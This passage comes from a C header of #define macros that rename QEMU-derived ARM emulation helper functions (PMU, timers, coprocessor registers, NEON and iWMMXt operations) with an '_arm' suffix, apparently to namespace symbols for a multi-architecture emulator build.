helper_check_breakpoints helper_check_breakpoints_arm #define arm_debug_check_watchpoint arm_debug_check_watchpoint_arm #define arm_debug_excp_handler arm_debug_excp_handler_arm #define arm_adjust_watchpoint_address arm_adjust_watchpoint_address_arm #define read_raw_cp_reg read_raw_cp_reg_arm #define pmu_init pmu_init_arm #define pmu_op_start pmu_op_start_arm #define pmu_op_finish pmu_op_finish_arm #define pmu_pre_el_change pmu_pre_el_change_arm #define pmu_post_el_change pmu_post_el_change_arm #define arm_pmu_timer_cb arm_pmu_timer_cb_arm #define arm_gt_ptimer_cb arm_gt_ptimer_cb_arm #define arm_gt_vtimer_cb arm_gt_vtimer_cb_arm #define arm_gt_htimer_cb arm_gt_htimer_cb_arm #define arm_gt_stimer_cb arm_gt_stimer_cb_arm #define arm_gt_hvtimer_cb arm_gt_hvtimer_cb_arm #define arm_hcr_el2_eff arm_hcr_el2_eff_arm #define sve_exception_el sve_exception_el_arm #define sve_zcr_len_for_el sve_zcr_len_for_el_arm #define hw_watchpoint_update hw_watchpoint_update_arm #define hw_watchpoint_update_all hw_watchpoint_update_all_arm #define hw_breakpoint_update hw_breakpoint_update_arm #define hw_breakpoint_update_all hw_breakpoint_update_all_arm #define register_cp_regs_for_features register_cp_regs_for_features_arm #define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_arm #define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_arm #define modify_arm_cp_regs modify_arm_cp_regs_arm #define get_arm_cp_reginfo get_arm_cp_reginfo_arm #define arm_cp_write_ignore arm_cp_write_ignore_arm #define arm_cp_read_zero arm_cp_read_zero_arm #define arm_cp_reset_ignore arm_cp_reset_ignore_arm #define cpsr_read cpsr_read_arm #define cpsr_write cpsr_write_arm #define helper_sxtb16 helper_sxtb16_arm #define helper_uxtb16 helper_uxtb16_arm #define helper_sdiv helper_sdiv_arm #define helper_udiv helper_udiv_arm #define helper_rbit helper_rbit_arm #define arm_phys_excp_target_el arm_phys_excp_target_el_arm #define aarch64_sync_32_to_64 aarch64_sync_32_to_64_arm #define aarch64_sync_64_to_32 aarch64_sync_64_to_32_arm #define arm_cpu_do_interrupt arm_cpu_do_interrupt_arm #define arm_sctlr arm_sctlr_arm #define arm_s1_regime_using_lpae_format arm_s1_regime_using_lpae_format_arm #define aa64_va_parameters aa64_va_parameters_arm #define v8m_security_lookup v8m_security_lookup_arm #define pmsav8_mpu_lookup pmsav8_mpu_lookup_arm #define get_phys_addr get_phys_addr_arm #define arm_cpu_get_phys_page_attrs_debug arm_cpu_get_phys_page_attrs_debug_arm #define helper_qadd16 helper_qadd16_arm #define helper_qadd8 helper_qadd8_arm #define helper_qsub16 helper_qsub16_arm #define helper_qsub8 helper_qsub8_arm #define helper_qsubaddx helper_qsubaddx_arm #define helper_qaddsubx helper_qaddsubx_arm #define helper_uqadd16 helper_uqadd16_arm #define helper_uqadd8 helper_uqadd8_arm #define helper_uqsub16 helper_uqsub16_arm #define helper_uqsub8 helper_uqsub8_arm #define helper_uqsubaddx helper_uqsubaddx_arm #define helper_uqaddsubx helper_uqaddsubx_arm #define helper_sadd16 helper_sadd16_arm #define helper_sadd8 helper_sadd8_arm #define helper_ssub16 helper_ssub16_arm #define helper_ssub8 helper_ssub8_arm #define helper_ssubaddx helper_ssubaddx_arm #define helper_saddsubx helper_saddsubx_arm #define helper_uadd16 helper_uadd16_arm #define helper_uadd8 helper_uadd8_arm #define helper_usub16 helper_usub16_arm #define helper_usub8 helper_usub8_arm #define helper_usubaddx helper_usubaddx_arm #define helper_uaddsubx helper_uaddsubx_arm #define helper_shadd16 helper_shadd16_arm #define helper_shadd8 helper_shadd8_arm #define helper_shsub16 helper_shsub16_arm #define helper_shsub8 helper_shsub8_arm #define helper_shsubaddx helper_shsubaddx_arm #define helper_shaddsubx helper_shaddsubx_arm #define helper_uhadd16 helper_uhadd16_arm #define helper_uhadd8 helper_uhadd8_arm #define helper_uhsub16 helper_uhsub16_arm #define helper_uhsub8 helper_uhsub8_arm #define helper_uhsubaddx helper_uhsubaddx_arm #define helper_uhaddsubx helper_uhaddsubx_arm #define helper_usad8 helper_usad8_arm #define helper_sel_flags helper_sel_flags_arm #define helper_crc32 helper_crc32_arm #define helper_crc32c helper_crc32c_arm #define fp_exception_el fp_exception_el_arm #define arm_mmu_idx_to_el arm_mmu_idx_to_el_arm #define arm_mmu_idx_el arm_mmu_idx_el_arm #define arm_mmu_idx arm_mmu_idx_arm #define arm_stage1_mmu_idx arm_stage1_mmu_idx_arm #define arm_rebuild_hflags arm_rebuild_hflags_arm #define helper_rebuild_hflags_m32_newel helper_rebuild_hflags_m32_newel_arm #define helper_rebuild_hflags_m32 helper_rebuild_hflags_m32_arm #define helper_rebuild_hflags_a32_newel helper_rebuild_hflags_a32_newel_arm #define helper_rebuild_hflags_a32 helper_rebuild_hflags_a32_arm #define helper_rebuild_hflags_a64 helper_rebuild_hflags_a64_arm #define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_arm #define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_arm #define helper_iwmmxt_madduq helper_iwmmxt_madduq_arm #define helper_iwmmxt_sadb helper_iwmmxt_sadb_arm #define helper_iwmmxt_sadw helper_iwmmxt_sadw_arm #define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_arm #define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_arm #define helper_iwmmxt_mululw helper_iwmmxt_mululw_arm #define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_arm #define helper_iwmmxt_macsw helper_iwmmxt_macsw_arm #define helper_iwmmxt_macuw helper_iwmmxt_macuw_arm #define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_arm #define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_arm #define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_arm #define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_arm #define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_arm #define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_arm #define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_arm #define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_arm #define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_arm #define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_arm #define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_arm #define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_arm #define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_arm #define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_arm #define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_arm #define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_arm #define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_arm #define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_arm #define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_arm #define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_arm #define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_arm #define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_arm #define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_arm #define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_arm #define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_arm #define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_arm #define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_arm #define helper_iwmmxt_minsb helper_iwmmxt_minsb_arm #define helper_iwmmxt_minsw helper_iwmmxt_minsw_arm #define helper_iwmmxt_minsl helper_iwmmxt_minsl_arm #define helper_iwmmxt_minub helper_iwmmxt_minub_arm #define helper_iwmmxt_minuw helper_iwmmxt_minuw_arm #define helper_iwmmxt_minul helper_iwmmxt_minul_arm #define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_arm #define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_arm #define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_arm #define helper_iwmmxt_maxub helper_iwmmxt_maxub_arm #define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_arm #define helper_iwmmxt_maxul helper_iwmmxt_maxul_arm #define helper_iwmmxt_subnb helper_iwmmxt_subnb_arm #define helper_iwmmxt_subnw helper_iwmmxt_subnw_arm #define helper_iwmmxt_subnl helper_iwmmxt_subnl_arm #define helper_iwmmxt_addnb helper_iwmmxt_addnb_arm #define helper_iwmmxt_addnw helper_iwmmxt_addnw_arm #define helper_iwmmxt_addnl helper_iwmmxt_addnl_arm #define helper_iwmmxt_subub helper_iwmmxt_subub_arm #define helper_iwmmxt_subuw helper_iwmmxt_subuw_arm #define helper_iwmmxt_subul helper_iwmmxt_subul_arm #define helper_iwmmxt_addub helper_iwmmxt_addub_arm #define helper_iwmmxt_adduw helper_iwmmxt_adduw_arm #define helper_iwmmxt_addul helper_iwmmxt_addul_arm #define helper_iwmmxt_subsb helper_iwmmxt_subsb_arm #define helper_iwmmxt_subsw helper_iwmmxt_subsw_arm #define helper_iwmmxt_subsl helper_iwmmxt_subsl_arm #define helper_iwmmxt_addsb helper_iwmmxt_addsb_arm #define helper_iwmmxt_addsw helper_iwmmxt_addsw_arm #define helper_iwmmxt_addsl helper_iwmmxt_addsl_arm #define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_arm #define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_arm #define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_arm #define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_arm #define helper_iwmmxt_align helper_iwmmxt_align_arm #define helper_iwmmxt_insr helper_iwmmxt_insr_arm #define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_arm #define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_arm #define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_arm #define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_arm #define helper_iwmmxt_addcb helper_iwmmxt_addcb_arm #define helper_iwmmxt_addcw helper_iwmmxt_addcw_arm #define helper_iwmmxt_addcl helper_iwmmxt_addcl_arm #define helper_iwmmxt_msbb helper_iwmmxt_msbb_arm #define helper_iwmmxt_msbw helper_iwmmxt_msbw_arm #define helper_iwmmxt_msbl helper_iwmmxt_msbl_arm #define helper_iwmmxt_srlw helper_iwmmxt_srlw_arm #define helper_iwmmxt_srll helper_iwmmxt_srll_arm #define helper_iwmmxt_srlq helper_iwmmxt_srlq_arm #define helper_iwmmxt_sllw helper_iwmmxt_sllw_arm #define helper_iwmmxt_slll helper_iwmmxt_slll_arm #define helper_iwmmxt_sllq helper_iwmmxt_sllq_arm #define helper_iwmmxt_sraw helper_iwmmxt_sraw_arm #define helper_iwmmxt_sral helper_iwmmxt_sral_arm #define helper_iwmmxt_sraq helper_iwmmxt_sraq_arm #define helper_iwmmxt_rorw helper_iwmmxt_rorw_arm #define helper_iwmmxt_rorl helper_iwmmxt_rorl_arm #define helper_iwmmxt_rorq helper_iwmmxt_rorq_arm #define helper_iwmmxt_shufh helper_iwmmxt_shufh_arm #define helper_iwmmxt_packuw helper_iwmmxt_packuw_arm #define helper_iwmmxt_packul helper_iwmmxt_packul_arm #define helper_iwmmxt_packuq helper_iwmmxt_packuq_arm #define helper_iwmmxt_packsw helper_iwmmxt_packsw_arm #define helper_iwmmxt_packsl helper_iwmmxt_packsl_arm #define helper_iwmmxt_packsq helper_iwmmxt_packsq_arm #define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_arm #define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_arm #define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_arm #define armv7m_nvic_set_pending armv7m_nvic_set_pending_arm #define helper_v7m_preserve_fp_state helper_v7m_preserve_fp_state_arm #define write_v7m_exception write_v7m_exception_arm #define helper_v7m_bxns helper_v7m_bxns_arm #define helper_v7m_blxns helper_v7m_blxns_arm #define armv7m_nvic_neg_prio_requested armv7m_nvic_neg_prio_requested_arm #define helper_v7m_vlstm helper_v7m_vlstm_arm #define helper_v7m_vlldm helper_v7m_vlldm_arm #define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_arm #define helper_v7m_mrs helper_v7m_mrs_arm #define helper_v7m_msr helper_v7m_msr_arm #define helper_v7m_tt helper_v7m_tt_arm #define arm_v7m_mmu_idx_all arm_v7m_mmu_idx_all_arm #define arm_v7m_mmu_idx_for_secstate_and_priv arm_v7m_mmu_idx_for_secstate_and_priv_arm #define arm_v7m_mmu_idx_for_secstate arm_v7m_mmu_idx_for_secstate_arm #define helper_neon_qadd_u8 helper_neon_qadd_u8_arm #define helper_neon_qadd_u16 helper_neon_qadd_u16_arm #define helper_neon_qadd_u32 helper_neon_qadd_u32_arm #define helper_neon_qadd_u64 helper_neon_qadd_u64_arm #define helper_neon_qadd_s8 helper_neon_qadd_s8_arm #define helper_neon_qadd_s16 helper_neon_qadd_s16_arm #define helper_neon_qadd_s32 helper_neon_qadd_s32_arm #define helper_neon_qadd_s64 helper_neon_qadd_s64_arm #define helper_neon_uqadd_s8 helper_neon_uqadd_s8_arm #define helper_neon_uqadd_s16 helper_neon_uqadd_s16_arm #define helper_neon_uqadd_s32 helper_neon_uqadd_s32_arm #define helper_neon_uqadd_s64 helper_neon_uqadd_s64_arm #define helper_neon_sqadd_u8 helper_neon_sqadd_u8_arm #define helper_neon_sqadd_u16 helper_neon_sqadd_u16_arm #define helper_neon_sqadd_u32 helper_neon_sqadd_u32_arm #define helper_neon_sqadd_u64 helper_neon_sqadd_u64_arm #define helper_neon_qsub_u8 helper_neon_qsub_u8_arm #define helper_neon_qsub_u16 helper_neon_qsub_u16_arm #define helper_neon_qsub_u32 helper_neon_qsub_u32_arm #define helper_neon_qsub_u64 helper_neon_qsub_u64_arm #define helper_neon_qsub_s8 helper_neon_qsub_s8_arm #define helper_neon_qsub_s16 helper_neon_qsub_s16_arm #define helper_neon_qsub_s32 helper_neon_qsub_s32_arm #define helper_neon_qsub_s64 helper_neon_qsub_s64_arm #define helper_neon_hadd_s8 helper_neon_hadd_s8_arm #define helper_neon_hadd_u8 helper_neon_hadd_u8_arm #define helper_neon_hadd_s16 helper_neon_hadd_s16_arm #define helper_neon_hadd_u16 helper_neon_hadd_u16_arm #define helper_neon_hadd_s32 helper_neon_hadd_s32_arm #define helper_neon_hadd_u32 helper_neon_hadd_u32_arm #define helper_neon_rhadd_s8 helper_neon_rhadd_s8_arm #define helper_neon_rhadd_u8 helper_neon_rhadd_u8_arm #define helper_neon_rhadd_s16 helper_neon_rhadd_s16_arm #define helper_neon_rhadd_u16 helper_neon_rhadd_u16_arm #define helper_neon_rhadd_s32 helper_neon_rhadd_s32_arm #define helper_neon_rhadd_u32 helper_neon_rhadd_u32_arm #define helper_neon_hsub_s8 helper_neon_hsub_s8_arm #define helper_neon_hsub_u8 helper_neon_hsub_u8_arm #define helper_neon_hsub_s16 helper_neon_hsub_s16_arm #define helper_neon_hsub_u16 helper_neon_hsub_u16_arm #define helper_neon_hsub_s32 helper_neon_hsub_s32_arm #define helper_neon_hsub_u32 helper_neon_hsub_u32_arm #define helper_neon_cgt_s8 helper_neon_cgt_s8_arm #define helper_neon_cgt_u8 helper_neon_cgt_u8_arm #define helper_neon_cgt_s16 helper_neon_cgt_s16_arm #define helper_neon_cgt_u16 helper_neon_cgt_u16_arm #define helper_neon_cgt_s32 helper_neon_cgt_s32_arm #define helper_neon_cgt_u32 helper_neon_cgt_u32_arm #define helper_neon_cge_s8 helper_neon_cge_s8_arm #define helper_neon_cge_u8 helper_neon_cge_u8_arm #define helper_neon_cge_s16 helper_neon_cge_s16_arm #define helper_neon_cge_u16 helper_neon_cge_u16_arm #define helper_neon_cge_s32 helper_neon_cge_s32_arm #define helper_neon_cge_u32 helper_neon_cge_u32_arm #define helper_neon_pmin_s8 helper_neon_pmin_s8_arm #define helper_neon_pmin_u8 helper_neon_pmin_u8_arm #define helper_neon_pmin_s16 helper_neon_pmin_s16_arm #define helper_neon_pmin_u16 helper_neon_pmin_u16_arm #define helper_neon_pmax_s8 helper_neon_pmax_s8_arm #define helper_neon_pmax_u8 helper_neon_pmax_u8_arm #define helper_neon_pmax_s16 helper_neon_pmax_s16_arm #define helper_neon_pmax_u16 helper_neon_pmax_u16_arm #define helper_neon_abd_s8 helper_neon_abd_s8_arm #define helper_neon_abd_u8 helper_neon_abd_u8_arm #define helper_neon_abd_s16 helper_neon_abd_s16_arm #define helper_neon_abd_u16 helper_neon_abd_u16_arm #define helper_neon_abd_s32 helper_neon_abd_s32_arm #define helper_neon_abd_u32 helper_neon_abd_u32_arm #define helper_neon_shl_u16 helper_neon_shl_u16_arm #define helper_neon_shl_s16 helper_neon_shl_s16_arm #define helper_neon_rshl_s8 helper_neon_rshl_s8_arm #define helper_neon_rshl_s16 helper_neon_rshl_s16_arm #define helper_neon_rshl_s32 helper_neon_rshl_s32_arm #define helper_neon_rshl_s64 helper_neon_rshl_s64_arm #define helper_neon_rshl_u8 helper_neon_rshl_u8_arm #define helper_neon_rshl_u16 helper_neon_rshl_u16_arm #define helper_neon_rshl_u32 helper_neon_rshl_u32_arm #define helper_neon_rshl_u64 helper_neon_rshl_u64_arm #define helper_neon_qshl_u8 helper_neon_qshl_u8_arm #define helper_neon_qshl_u16 helper_neon_qshl_u16_arm #define helper_neon_qshl_u32 helper_neon_qshl_u32_arm #define helper_neon_qshl_u64 helper_neon_qshl_u64_arm #define helper_neon_qshl_s8 helper_neon_qshl_s8_arm #define helper_neon_qshl_s16 helper_neon_qshl_s16_arm #define helper_neon_qshl_s32 helper_neon_qshl_s32_arm #define helper_neon_qshl_s64 helper_neon_qshl_s64_arm #define helper_neon_qshlu_s8 helper_neon_qshlu_s8_arm #define helper_neon_qshlu_s16 helper_neon_qshlu_s16_arm #define helper_neon_qshlu_s32 helper_neon_qshlu_s32_arm #define helper_neon_qshlu_s64 helper_neon_qshlu_s64_arm #define helper_neon_qrshl_u8 helper_neon_qrshl_u8_arm #define helper_neon_qrshl_u16 helper_neon_qrshl_u16_arm #define helper_neon_qrshl_u32 helper_neon_qrshl_u32_arm #define helper_neon_qrshl_u64 helper_neon_qrshl_u64_arm #define helper_neon_qrshl_s8 helper_neon_qrshl_s8_arm #define helper_neon_qrshl_s16 helper_neon_qrshl_s16_arm #define helper_neon_qrshl_s32 helper_neon_qrshl_s32_arm #define helper_neon_qrshl_s64 helper_neon_qrshl_s64_arm #define helper_neon_add_u8 helper_neon_add_u8_arm #define helper_neon_add_u16 helper_neon_add_u16_arm #define helper_neon_padd_u8 helper_neon_padd_u8_arm #define helper_neon_padd_u16 helper_neon_padd_u16_arm #define helper_neon_sub_u8 helper_neon_sub_u8_arm #define helper_neon_sub_u16 helper_neon_sub_u16_arm #define helper_neon_mul_u8 helper_neon_mul_u8_arm #define helper_neon_mul_u16 helper_neon_mul_u16_arm #define helper_neon_tst_u8 helper_neon_tst_u8_arm #define helper_neon_tst_u16 helper_neon_tst_u16_arm #define helper_neon_tst_u32 helper_neon_tst_u32_arm #define helper_neon_ceq_u8 helper_neon_ceq_u8_arm #define helper_neon_ceq_u16 helper_neon_ceq_u16_arm #define helper_neon_ceq_u32 helper_neon_ceq_u32_arm #define helper_neon_clz_u8 helper_neon_clz_u8_arm #define helper_neon_clz_u16 helper_neon_clz_u16_arm #define helper_neon_cls_s8 helper_neon_cls_s8_arm #define helper_neon_cls_s16 helper_neon_cls_s16_arm #define helper_neon_cls_s32 helper_neon_cls_s32_arm #define helper_neon_cnt_u8 helper_neon_cnt_u8_arm #define helper_neon_rbit_u8 helper_neon_rbit_u8_arm #define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_arm #define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_arm #define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_arm #define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_arm #define helper_neon_narrow_u8 helper_neon_narrow_u8_arm #define helper_neon_narrow_u16 helper_neon_narrow_u16_arm #define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_arm #define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_arm #define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_arm #define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_arm #define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_arm #define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_arm #define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_arm #define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_arm #define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_arm #define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_arm #define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_arm #define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_arm #define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_arm #define helper_neon_widen_u8 helper_neon_widen_u8_arm #define helper_neon_widen_s8 helper_neon_widen_s8_arm #define helper_neon_widen_u16 helper_neon_widen_u16_arm #define helper_neon_widen_s16 helper_neon_widen_s16_arm #define helper_neon_addl_u16 helper_neon_addl_u16_arm #define helper_neon_addl_u32 helper_neon_addl_u32_arm #define helper_neon_paddl_u16 helper_neon_paddl_u16_arm #define helper_neon_paddl_u32 helper_neon_paddl_u32_arm #define helper_neon_subl_u16 helper_neon_subl_u16_arm #define helper_neon_subl_u32 helper_neon_subl_u32_arm #define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_arm #define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_arm #define helper_neon_abdl_u16 helper_neon_abdl_u16_arm #define helper_neon_abdl_s16 helper_neon_abdl_s16_arm #define helper_neon_abdl_u32 helper_neon_abdl_u32_arm #define helper_neon_abdl_s32 helper_neon_abdl_s32_arm #define helper_neon_abdl_u64 helper_neon_abdl_u64_arm #define helper_neon_abdl_s64 helper_neon_abdl_s64_arm #define helper_neon_mull_u8 helper_neon_mull_u8_arm #define helper_neon_mull_s8 helper_neon_mull_s8_arm #define helper_neon_mull_u16 helper_neon_mull_u16_arm #define helper_neon_mull_s16 helper_neon_mull_s16_arm #define helper_neon_negl_u16 helper_neon_negl_u16_arm #define helper_neon_negl_u32 helper_neon_negl_u32_arm #define helper_neon_qabs_s8 helper_neon_qabs_s8_arm #define helper_neon_qneg_s8 helper_neon_qneg_s8_arm #define helper_neon_qabs_s16 helper_neon_qabs_s16_arm #define helper_neon_qneg_s16 helper_neon_qneg_s16_arm #define helper_neon_qabs_s32 helper_neon_qabs_s32_arm #define helper_neon_qneg_s32 helper_neon_qneg_s32_arm #define helper_neon_qabs_s64 helper_neon_qabs_s64_arm #define helper_neon_qneg_s64 helper_neon_qneg_s64_arm #define helper_neon_abd_f32 helper_neon_abd_f32_arm #define helper_neon_ceq_f32 helper_neon_ceq_f32_arm #define helper_neon_cge_f32 helper_neon_cge_f32_arm #define helper_neon_cgt_f32 helper_neon_cgt_f32_arm #define helper_neon_acge_f32 helper_neon_acge_f32_arm #define helper_neon_acgt_f32 helper_neon_acgt_f32_arm #define helper_neon_acge_f64 helper_neon_acge_f64_arm #define helper_neon_acgt_f64 helper_neon_acgt_f64_arm #define helper_neon_qunzip8 helper_neon_qunzip8_arm #define helper_neon_qunzip16 helper_neon_qunzip16_arm #define helper_neon_qunzip32 helper_neon_qunzip32_arm #define helper_neon_unzip8 helper_neon_unzip8_arm #define helper_neon_unzip16 helper_neon_unzip16_arm #define helper_neon_qzip8 helper_neon_qzip8_arm #define helper_neon_qzip16 helper_neon_qzip16_arm #define helper_neon_qzip32 helper_neon_qzip32_arm #define helper_neon_zip8 helper_neon_zip8_arm #define helper_neon_zip16 helper_neon_zip16_arm #define raise_exception raise_exception_arm #define raise_exception_ra raise_exception_ra_arm #define helper_neon_tbl helper_neon_tbl_arm #define helper_v8m_stackcheck helper_v8m_stackcheck_arm #define helper_add_setq helper_add_setq_arm #define helper_add_saturate helper_add_saturate_arm #define helper_sub_saturate helper_sub_saturate_arm #define helper_add_usaturate helper_add_usaturate_arm #define helper_sub_usaturate helper_sub_usaturate_arm #define helper_ssat helper_ssat_arm #define helper_ssat16 helper_ssat16_arm #define helper_usat helper_usat_arm #define helper_usat16 helper_usat16_arm #define helper_setend helper_setend_arm #define helper_wfi helper_wfi_arm #define helper_wfe helper_wfe_arm #define helper_yield helper_yield_arm #define helper_exception_internal helper_exception_internal_arm #define helper_exception_with_syndrome helper_exception_with_syndrome_arm #define helper_exception_bkpt_insn helper_exception_bkpt_insn_arm #define helper_cpsr_read helper_cpsr_read_arm #define helper_cpsr_write helper_cpsr_write_arm #define helper_cpsr_write_eret helper_cpsr_write_eret_arm #define helper_get_user_reg helper_get_user_reg_arm #define helper_set_user_reg helper_set_user_reg_arm #define helper_set_r13_banked helper_set_r13_banked_arm #define helper_get_r13_banked helper_get_r13_banked_arm #define helper_msr_banked helper_msr_banked_arm #define helper_mrs_banked helper_mrs_banked_arm #define helper_access_check_cp_reg helper_access_check_cp_reg_arm #define helper_set_cp_reg helper_set_cp_reg_arm #define helper_get_cp_reg helper_get_cp_reg_arm #define helper_set_cp_reg64 helper_set_cp_reg64_arm #define helper_get_cp_reg64 helper_get_cp_reg64_arm #define helper_pre_hvc helper_pre_hvc_arm #define helper_pre_smc helper_pre_smc_arm #define helper_shl_cc helper_shl_cc_arm #define helper_shr_cc helper_shr_cc_arm #define helper_sar_cc helper_sar_cc_arm #define helper_ror_cc helper_ror_cc_arm #define arm_is_psci_call arm_is_psci_call_arm #define arm_handle_psci_call arm_handle_psci_call_arm #define arm_cpu_do_unaligned_access arm_cpu_do_unaligned_access_arm #define arm_cpu_do_transaction_failed arm_cpu_do_transaction_failed_arm #define arm_cpu_tlb_fill arm_cpu_tlb_fill_arm #define arm_translate_init arm_translate_init_arm #define arm_test_cc arm_test_cc_arm #define arm_free_cc arm_free_cc_arm #define arm_jump_cc arm_jump_cc_arm #define arm_gen_test_cc arm_gen_test_cc_arm #define vfp_expand_imm vfp_expand_imm_arm #define gen_cmtst_i64 gen_cmtst_i64_arm #define gen_ushl_i32 gen_ushl_i32_arm #define gen_ushl_i64 gen_ushl_i64_arm #define gen_sshl_i32 gen_sshl_i32_arm #define gen_sshl_i64 gen_sshl_i64_arm #define gen_intermediate_code gen_intermediate_code_arm #define restore_state_to_opc restore_state_to_opc_arm #define helper_neon_qrdmlah_s16 helper_neon_qrdmlah_s16_arm #define helper_gvec_qrdmlah_s16 helper_gvec_qrdmlah_s16_arm #define helper_neon_qrdmlsh_s16 helper_neon_qrdmlsh_s16_arm #define helper_gvec_qrdmlsh_s16 helper_gvec_qrdmlsh_s16_arm #define helper_neon_qrdmlah_s32 helper_neon_qrdmlah_s32_arm #define helper_gvec_qrdmlah_s32 helper_gvec_qrdmlah_s32_arm #define helper_neon_qrdmlsh_s32 helper_neon_qrdmlsh_s32_arm #define helper_gvec_qrdmlsh_s32 helper_gvec_qrdmlsh_s32_arm #define helper_gvec_sdot_b helper_gvec_sdot_b_arm #define helper_gvec_udot_b helper_gvec_udot_b_arm #define helper_gvec_sdot_h helper_gvec_sdot_h_arm #define helper_gvec_udot_h helper_gvec_udot_h_arm #define helper_gvec_sdot_idx_b helper_gvec_sdot_idx_b_arm #define helper_gvec_udot_idx_b helper_gvec_udot_idx_b_arm #define helper_gvec_sdot_idx_h helper_gvec_sdot_idx_h_arm #define helper_gvec_udot_idx_h helper_gvec_udot_idx_h_arm #define helper_gvec_fcaddh helper_gvec_fcaddh_arm #define helper_gvec_fcadds helper_gvec_fcadds_arm #define helper_gvec_fcaddd helper_gvec_fcaddd_arm #define helper_gvec_fcmlah helper_gvec_fcmlah_arm #define helper_gvec_fcmlah_idx helper_gvec_fcmlah_idx_arm #define helper_gvec_fcmlas helper_gvec_fcmlas_arm #define helper_gvec_fcmlas_idx helper_gvec_fcmlas_idx_arm #define helper_gvec_fcmlad helper_gvec_fcmlad_arm #define helper_gvec_frecpe_h helper_gvec_frecpe_h_arm #define helper_gvec_frecpe_s helper_gvec_frecpe_s_arm #define helper_gvec_frecpe_d helper_gvec_frecpe_d_arm #define helper_gvec_frsqrte_h helper_gvec_frsqrte_h_arm #define helper_gvec_frsqrte_s helper_gvec_frsqrte_s_arm #define helper_gvec_frsqrte_d helper_gvec_frsqrte_d_arm #define helper_gvec_fadd_h helper_gvec_fadd_h_arm #define helper_gvec_fadd_s helper_gvec_fadd_s_arm #define helper_gvec_fadd_d helper_gvec_fadd_d_arm #define helper_gvec_fsub_h helper_gvec_fsub_h_arm #define helper_gvec_fsub_s helper_gvec_fsub_s_arm #define helper_gvec_fsub_d helper_gvec_fsub_d_arm #define helper_gvec_fmul_h helper_gvec_fmul_h_arm #define helper_gvec_fmul_s helper_gvec_fmul_s_arm #define helper_gvec_fmul_d helper_gvec_fmul_d_arm #define helper_gvec_ftsmul_h helper_gvec_ftsmul_h_arm #define helper_gvec_ftsmul_s helper_gvec_ftsmul_s_arm #define helper_gvec_ftsmul_d helper_gvec_ftsmul_d_arm #define helper_gvec_fmul_idx_h helper_gvec_fmul_idx_h_arm #define helper_gvec_fmul_idx_s helper_gvec_fmul_idx_s_arm #define helper_gvec_fmul_idx_d helper_gvec_fmul_idx_d_arm #define helper_gvec_fmla_idx_h helper_gvec_fmla_idx_h_arm #define helper_gvec_fmla_idx_s helper_gvec_fmla_idx_s_arm #define helper_gvec_fmla_idx_d helper_gvec_fmla_idx_d_arm #define helper_gvec_uqadd_b 